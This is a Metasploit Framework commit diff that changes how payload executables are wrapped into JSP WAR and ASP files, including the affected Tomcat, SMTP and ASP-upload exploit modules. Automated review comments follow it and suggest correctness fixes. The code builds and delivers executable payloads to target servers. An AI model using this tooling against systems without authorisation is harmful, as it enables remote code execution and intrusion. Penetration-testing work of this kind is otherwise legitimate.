rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32
git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2cd8b7d5e2
commit
bd1eeb3722
|
@ -97,7 +97,8 @@ module Payload
|
||||||
plat = Msf::Module::PlatformList.transform(opts['Platform'])
|
plat = Msf::Module::PlatformList.transform(opts['Platform'])
|
||||||
|
|
||||||
tmp_plat = plat.platforms
|
tmp_plat = plat.platforms
|
||||||
buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
|
exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
|
||||||
|
buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
|
||||||
else
|
else
|
||||||
# Serialize the generated payload to some sort of format
|
# Serialize the generated payload to some sort of format
|
||||||
buf = Buffer.transform(e.encoded, fmt)
|
buf = Buffer.transform(e.encoded, fmt)
|
||||||
|
|
|
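Review bot: The `:persist => false` option that previously reached `to_executable` through the opts hash forwarded by the old `to_jsp_war` (see the removed `exe = to_executable(framework, arch, plat, code, opts)` in this commit) is now handed only to `to_jsp_war`, so if `to_executable` honours `:persist` the EXE generated on this path silently changes; pass it explicitly if that was intended: `exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :persist => false, :template => altexe })`. `to_executable` apparently can return nil (msfpayload in this same commit tests its result with `if(exe)`), and here nil would go straight into `to_jsp_war`; guard it with `raise RuntimeError, "Could not build an executable for #{arch.inspect}/#{tmp_plat.inspect}" unless exe`. The enclosing method starts and ends outside the hunk.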
@ -216,7 +216,8 @@ class Module < Base
|
||||||
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
||||||
when 'war'
|
when 'war'
|
||||||
tmp_plat = plat.platforms
|
tmp_plat = plat.platforms
|
||||||
output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
|
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
|
||||||
|
output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
|
||||||
else
|
else
|
||||||
fmt ||= "ruby"
|
fmt ||= "ruby"
|
||||||
output = Msf::Simple::Buffer.transform(raw, fmt)
|
output = Msf::Simple::Buffer.transform(raw, fmt)
|
||||||
|
|
|
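Review bot: The new 'war' branch drops the `:insert => inject` option that the neighbouring 'asp' branch (`to_win32pe_asp(..., {:insert => inject, ...})`) and the msfencode 'war' branch in this same commit both pass to the EXE builder, so an injection template requested from the console is silently ignored when the output format is a WAR. Keep the three paths consistent with `exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :persist => false, :template => altexe })`. `exe` is also passed to `to_jsp_war` unchecked, whereas msfpayload in this commit guards the equivalent `to_executable` result with `if(exe)`; the same guard belongs here. The enclosing `case` starts and ends outside the hunk.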
@ -813,9 +813,7 @@ require 'metasm'
|
||||||
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
|
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
|
||||||
# The jsp page converts the hexdump back to a normal .exe file and places it in
|
# The jsp page converts the hexdump back to a normal .exe file and places it in
|
||||||
# the temp directory. The payload .exe file is then executed.
|
# the temp directory. The payload .exe file is then executed.
|
||||||
def self.to_jsp_war(framework, arch, plat, code='', opts={})
|
def self.to_jsp_war(exe, opts={})
|
||||||
|
|
||||||
exe = to_executable(framework, arch, plat, code, opts)
|
|
||||||
|
|
||||||
# begin <payload>.jsp
|
# begin <payload>.jsp
|
||||||
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
|
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
|
||||||
|
|
|
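Review bot: The header comment was not updated for the new signature: it still says the function embeds a "hexdump of a payload" it builds itself, while `to_jsp_war` now receives a caller-built `exe` and no longer has `framework`/`arch`/`plat`/`code` to pick an executable format with. Add parameter lines such as `# exe  - executable bytes to embed (e.g. the result of to_executable); the caller now owns arch/platform selection` and `# opts - WAR/JSP options; callers in this commit pass :jsp_name, :app_name and :persist`. Since every caller in this commit feeds a `to_executable`/`generate_payload_exe` result straight in and msfpayload treats that result as nil-able (`if(exe)`), an early `raise ArgumentError, "exe must be a non-empty executable" if exe.nil? || exe.empty?` would fail here instead of producing a WAR around an empty hexdump. The body continues past the hunk.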
@ -172,9 +172,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
:jsp_name => jsp_name
|
:jsp_name => jsp_name
|
||||||
})
|
})
|
||||||
else
|
else
|
||||||
@war_data = Msf::Util::EXE.to_jsp_war(framework,
|
exe = generate_payload_exe({ :code => p.encoded })
|
||||||
arch, plat,
|
@war_data = Msf::Util::EXE.to_jsp_war(exe,
|
||||||
p.encoded,
|
|
||||||
{
|
{
|
||||||
:app_name => app_base,
|
:app_name => app_base,
|
||||||
:jsp_name => jsp_name
|
:jsp_name => jsp_name
|
||||||
|
|
|
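Review bot: `generate_payload_exe` is called here but this section shows no `include Msf::Exploit::EXE`, whereas three other exploit modules in this commit add that include next to the same call; unless the mixin is already included earlier in this file (outside the hunk) this `else` branch raises NoMethodError at exploit time, so confirm and add `include Msf::Exploit::EXE` if it is missing. The removed lines also chose `arch, plat` explicitly, and the new call inherits whatever the helper derives on its own; the `{ :code => p.encoded }` argument shows it accepts an options hash, so `:arch`/`:platform` can be passed if the implicit choice does not match this module's targets. `@war_data` is built without checking that `exe` is non-nil. The enclosing method starts and ends outside the hunk.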
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
|
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -182,16 +183,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
print_status("Using manually select target \"#{mytarget.name}\"")
|
print_status("Using manually select target \"#{mytarget.name}\"")
|
||||||
end
|
end
|
||||||
|
|
||||||
# set arch/platform from the target
|
|
||||||
arch = mytarget['Arch']
|
|
||||||
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
|
|
||||||
|
|
||||||
# Generate the WAR containing the EXE containing the payload
|
# Generate the WAR containing the EXE containing the payload
|
||||||
jsp_name = rand_text_alphanumeric(4+rand(32-4))
|
jsp_name = rand_text_alphanumeric(4+rand(32-4))
|
||||||
war = Msf::Util::EXE.to_jsp_war(framework,
|
exe = generate_payload_exe
|
||||||
arch, plat,
|
war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
|
||||||
payload.encoded,
|
|
||||||
:jsp_name => jsp_name)
|
|
||||||
|
|
||||||
app_base = rand_text_alphanumeric(4+rand(32-4))
|
app_base = rand_text_alphanumeric(4+rand(32-4))
|
||||||
query_str = "?path=/" + app_base
|
query_str = "?path=/" + app_base
|
||||||
|
|
|
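Review bot: The auto-target path loses its arch/platform: the removed lines derived both from `mytarget` (the target the module just reported with "Using manually select target"), but the bare `generate_payload_exe` call no longer references `mytarget`, so it presumably falls back to the datastore-selected target, which differs whenever auto-targeting picked another entry. If the helper accepts options the way the `{ :code => ... }` call elsewhere in this commit indicates, pass them explicitly, e.g. `exe = generate_payload_exe(:arch => mytarget['Arch'], :platform => Msf::Module::PlatformList.new(mytarget['Platform']))`, matching what the removed lines computed. `war` is also built without checking that `exe` is non-nil, while msfpayload in this commit guards the equivalent result with `if(exe)`. The enclosing method starts and ends outside the hunk.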
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# This module sends email messages via smtp
|
# This module sends email messages via smtp
|
||||||
#
|
#
|
||||||
include Msf::Exploit::Remote::SMTPDeliver
|
include Msf::Exploit::Remote::SMTPDeliver
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -142,16 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
if (target.arch.include?(ARCH_CMD))
|
if (target.arch.include?(ARCH_CMD))
|
||||||
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
|
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
|
||||||
else
|
else
|
||||||
bin = ''
|
bin = generate_payload_exe
|
||||||
|
|
||||||
if(target.arch.index(ARCH_PPC))
|
|
||||||
bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
|
|
||||||
end
|
|
||||||
|
|
||||||
if(target.arch.index(ARCH_X86))
|
|
||||||
bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
|
|
||||||
end
|
|
||||||
|
|
||||||
cmd = Rex::Text.encode_base64(bin, "\r\n")
|
cmd = Rex::Text.encode_base64(bin, "\r\n")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
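Review bot: `bin` goes into `Rex::Text.encode_base64` unchecked: the removed code at least initialised `bin = ''`, while `generate_payload_exe` presumably returns nil when it cannot build an executable for the target (msfpayload in this commit tests its `to_executable` result with `if(exe)`), and base64-encoding nil would surface as an unrelated error from inside `exploit`. Add `raise RuntimeError, "Could not generate an executable for #{target.name}" unless bin` before the encode. It is also worth confirming that the generic helper picks a Mach-O for this module's OSX targets, since the explicit `to_osx_ppc_macho`/`to_osx_x86_macho` selection is gone and the commit message describes an x86/win32 default elsewhere. The enclosing method starts and ends outside the hunk.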
@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -55,13 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
arch = target['Arch']
|
|
||||||
plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
|
|
||||||
|
|
||||||
# Generate the WAR containing the EXE containing the payload
|
# Generate the WAR containing the EXE containing the payload
|
||||||
app_base = rand_text_alphanumeric(4+rand(32-4))
|
app_base = rand_text_alphanumeric(4+rand(32-4))
|
||||||
jsp_name = rand_text_alphanumeric(8+rand(8))
|
jsp_name = rand_text_alphanumeric(8+rand(8))
|
||||||
war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
|
|
||||||
|
exe = generate_payload_exe
|
||||||
|
war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
|
||||||
|
|
||||||
res = send_request_cgi(
|
res = send_request_cgi(
|
||||||
{
|
{
|
||||||
|
|
|
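Review bot: `war_data` is assembled even when `exe` is nil: nothing checks the `generate_payload_exe` result before `to_jsp_war(exe, ...)`, whereas msfpayload in this same commit guards the equivalent `to_executable` result with `if(exe)`, so an unsupported target combination would upload a WAR wrapping an empty body and fail on the server rather than here. Add `raise RuntimeError, "Failed to generate a payload executable for the selected target" unless exe` between the two calls. The removed `arch`/`plat` derivation from `target[...]` is now implicit in the helper, which is only equivalent if the helper reads the same target fields; that is not visible in the hunk. The `exploit` method continues past the hunk.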
@ -50,7 +50,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
# Generate the ASP containing the EXE containing the payload
|
# Generate the ASP containing the EXE containing the payload
|
||||||
asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
|
exe = generate_payload_exe
|
||||||
|
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||||
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
|
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
|
||||||
path_tmp = path.gsub(/\....$/, ".txt")
|
path_tmp = path.gsub(/\....$/, ".txt")
|
||||||
|
|
||||||
|
|
|
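Review bot: This call site switches to `Msf::Util::EXE.to_exe_asp(exe)` while the two ASP paths touched elsewhere in this commit (the console `generate` dispatcher and msfencode) still call `to_win32pe_asp($framework, raw, {...})`, so the helper change is applied inconsistently, and `to_exe_asp` itself does not appear in the exe.rb hunk shown here; confirm it exists in this revision, otherwise the module raises NoMethodError at exploit time. `exe` is also passed through unchecked; if `generate_payload_exe` can return nil (msfpayload guards the equivalent result with `if(exe)`), add `raise RuntimeError, "Failed to generate payload executable" unless exe` before the ASP is built. The `exploit` method continues past the hunk.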
@ -273,8 +273,11 @@ case cmd
|
||||||
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
|
||||||
write_encoded(asp)
|
write_encoded(asp)
|
||||||
when 'war'
|
when 'war'
|
||||||
tmp_plat = plat.platforms
|
arch ||= [ ARCH_X86 ]
|
||||||
war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
|
tmp_plat = plat.platforms if plat
|
||||||
|
tmp_plat ||= Msf::Module::PlatformList.transform('win')
|
||||||
|
exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
|
||||||
|
war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
|
||||||
write_encoded(war)
|
write_encoded(war)
|
||||||
else
|
else
|
||||||
fmt ||= "ruby"
|
fmt ||= "ruby"
|
||||||
|
|
|
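Review bot: The two assignments to `tmp_plat` yield different types: `plat.platforms` is the array this commit uses everywhere else, while `Msf::Module::PlatformList.transform('win')` is the object that the payload hunk calls `.platforms` on, so the new x86/win32 default passes a PlatformList where the other branch passes an array; unless `to_executable` accepts both, use `tmp_plat ||= Msf::Module::PlatformList.transform('win').platforms`. Silently defaulting to win32/x86 when no platform or arch was specified is worth surfacing with a `$stderr.puts` notice so a user wrapping a non-Windows payload in a WAR sees the mismatch. Note also that `:persist => false`, which previously reached `to_executable` through the forwarded opts, is now only given to `to_jsp_war`. The `case cmd` begins and ends outside the hunk.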
@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
|
||||||
arch = payload.arch
|
arch = payload.arch
|
||||||
plat = payload.platform.platforms
|
plat = payload.platform.platforms
|
||||||
|
|
||||||
exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
|
exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
|
||||||
|
exe = Msf::Util::EXE.to_jsp_war(exe)
|
||||||
|
|
||||||
|
|
||||||
if(exe)
|
if(exe)
|
||||||
|
|
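Review bot: The `if(exe)` guard now sits after `to_jsp_war`, so when `to_executable` returns nil that nil is wrapped into a WAR before it is ever checked, and the guard ends up testing the archive rather than the executable. Move the check between the two calls, e.g. `exe = Msf::Util::EXE.to_jsp_war(exe) if exe`, or better keep distinct names (`war = Msf::Util::EXE.to_jsp_war(exe)`) since reusing `exe` for the archive makes the later `if(exe)` read as an executable check. The enclosing `if (cmd =~ ...)` block starts and ends outside the hunk.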